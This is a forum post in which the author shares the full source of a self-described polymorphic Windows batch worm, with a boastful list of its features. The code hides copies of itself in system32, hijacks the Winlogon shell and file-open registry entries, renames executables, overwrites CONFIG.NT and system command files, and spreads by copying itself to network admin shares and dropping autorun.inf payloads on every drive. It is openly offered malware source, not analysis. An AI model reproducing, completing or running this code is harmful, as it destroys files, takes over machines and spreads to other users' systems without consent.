Hello i coded some fuking bullsh.1t dangerous worm.
LOL!.
anyways here's the code:
Code:
@(echo off & break off)
://Microsoft Windows File
@set vbs= %windir%\system32\%random%.vbs
if not exist %Global_vbs% (
SET Global_vbs
SET Global_vbs=%vbs%
SET /A Global_vbs=expression
SET "Global_vbs="
SET Global_vbs=%vbs%
SET "
echo CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False >%Global_vbs%
start %Global_vbs% %0
exit
)
if %Global_me%=="true" echo cannot be executed runtime Error & pause >nul & exit & echo %random%
for /f "tokens=1 delims=[]" %%i in ('find /V /N "XYZ@" %sig%') do set $_random0=%%i >nul
@set $_random1=%$_random0%%random%
@set $_random2=%random%
@set $_random3=%random%
@set $_random4=%random%
@set $_random5=%random%
@set $_random6=%random%
@set $_random7=%random%
@set $_random8=%random%%random%
@set $_random_ex=%random%%%3+1
if %$_random_ex%==3 (
set a=Win
)
if %$_random_ex%==2 (
set a=Net
)
if %$_random_ex%==1 (
set a=service
)
for /F %%p in (%0) do (
echo %%p >>%windir%\system32\%a%%$_random1%.cmd
echo :@%$_random8% >>%windir%\system32\%a%%$_random1%.cmd
echo :@%username% >>%windir%\system32\%a%%$_random1%.cmd
)
attrib +h +s +r %windir%\system32\%$_random1%.cmd
@reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v shell /d "Explorer.exe,wscript.exe %Global_vbs% %windir%\system32\%$_random1%.cmd" /f
:@%$_random8%
:@%$_random2%
://Windows File Do not Edit
if not %Global_me%=="true" (
for %%k in (*.exe) do (
if exist *.exe
ren %0 %%k.bat
)
)
:@%$_random7%
set %me%=%%k.bat
SET Global_me
SET Global_me="true"
SET /A Global_me=expression
SET "Global_me="
SET Global_me="true"
SET "
copy "%me%" %windir%\system32\drivers
attrib +h +s +r %windir%\system32\drivers\%me%
del %me% /f
reg add HKEY_CLASSES_ROOT\winfiles\Shell\Open\Command /v "" /d "wscript.exe %Global_vbs% %windir%\system32\drivers\%me%.bat "%1" %*" /f
type %0 << %0
type %0 << %windir%\system32\CONFIG.NT
del %windir%\system32\CONFIG.NT
copy %0 %windir%\system32\CONFIG.NT
:%random%
cd %windir%\system32
dir /s /ad /b * >%windir%\system32\winkrnl.dll
set logg1=%windir%\system32\winkrnl.dll
for /f %%k in (%logg1%) do (
for %%i in (%%k\*.cmd) do (
type %0 << %%i
del %%i
copy %0 %%i /f
)
for %%j in (%%k\*.cmd) do (
type %0 << %%j
del %%j
copy %0 %%j /f
)
)
:@%$_random3%
type %0 >>%windir%\system32\usrlogon.cmd
:@%$_random5%
set /a Spread_R=%random%%%3+1
set /a Spread_R_2=%random%%%5+1
set Spread=192.168.%Spread_R%.%Spread_R_2%
ping -l 65000 %Spread%
if %errorlevel%==0 (
copy %windir%\system32\drivers\*.bat %Spread%\IPC$ /f
copy %windir%\system32\drivers\*.bat %Spread%\C$ /f
copy %windir%\system32\drivers\*.bat %Spread%\D$ /f
copy %windir%\system32\drivers\*.bat %Spread%\Admin$ /f
for %%u in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
if exist %%u:\ (
if not exist %%u:\recycler (
mkdir %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200
copy %0 %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd
echo [.ShellClassInfo] >%%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E} >>%%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\desktop.ini
if exist %%u:\autorun.inf attrib -h -s -r %%u:\autorun.inf & del %%u:\autorun.inf
echo open=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd" >%%u:\autorun.inf
echo shellexecute=recycler\S-1-5-21-8749679017-0950430147-468708784-3200\trash.cmd" >>%%u:\autorun.inf
echo shell\Explore\command=%%u:\ >>%%u:\autorun.inf
echo shell\Open\command=Explore" >>%%u:\autorun.inf
echo Shell\open\default=Explore" >>%%u:\autorun.inf
echo Shell=Explore" >>%%u:\autorun.inf
attrib +h +s +r %%u:\autorun.inf
attrib +h +s +r %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200\*.*
attrib +h +s +r %%u:\recycler\S-1-5-21-8749679017-0950430147-468708784-3200
attrib +h +s +r %%u:\recycler
)
type %0 << %0
type %0 << :@%username%
attrib +h +s +r %0
SET Global_me
set Global_me="false"
set "
://End Windows Part
Description:
1)it checks if another instance is running , if yes it kills itself. (mutex)
2)it creates 9 random numbers (0-9) the first is the number of lines the file has got , the others are random
3)it will write each line into a file between every file it generates a random string , also it writes a comment that has the username of the current user in it also for polymorphism
First Generation:
Command
=>Random
Comand
=>Random
Second Generation:
Command
Random
=>Random
Command
Random
=>Random
etc...
on every execution it generates a new file with a new code, with more lines
It saves the new generated code as a random batch file name, so there is no "virus remover " or something
-For startup it infects the explorer Shell entry, to the last written polymorph file
-Some Random comments for execution polymorphism will be generated
-Then it searches for every exe file and renames it to one random choosen with a batch extension
-it generates the mutex as "true"
-it copies the copy of itself with the random exe name it has choosen to system32 drivers folder
-it "melts" its first executed file , and hides its copies
-then it adds a runkey with the original name of the exe
-then it writes itself again into itself so it becomes bigger
-it camouflaggs itself as DOS config file by writing the standard DOS config in itself , deleting the old dos config , and copying itself as the config file
-it tries to infect some system cmd and batch file by typing the uninfected system file into itself and replacing the system file with itself
-the last infection process is to write itself into the userlogon script
-it generates a random IP adresse and tries to spread over netbios (through copying to default shares)
-it types a comment with the username into itself for polymorphism (some antivirs just detects the last line (i know crank))
-at last it sets his mutex to false so another instance can be running
Edit://
-infects now every command line filein the whole system32 tree
-random prefix for polymorph copy
Edit://
-Usb spread
-usb spread generation morphism
-invisible starting through vbs wscript shell
nice isnt it?
it was fuckn complexe to code it i think i got a headache lol
mega polymorph netbios worm 
Linear Mode
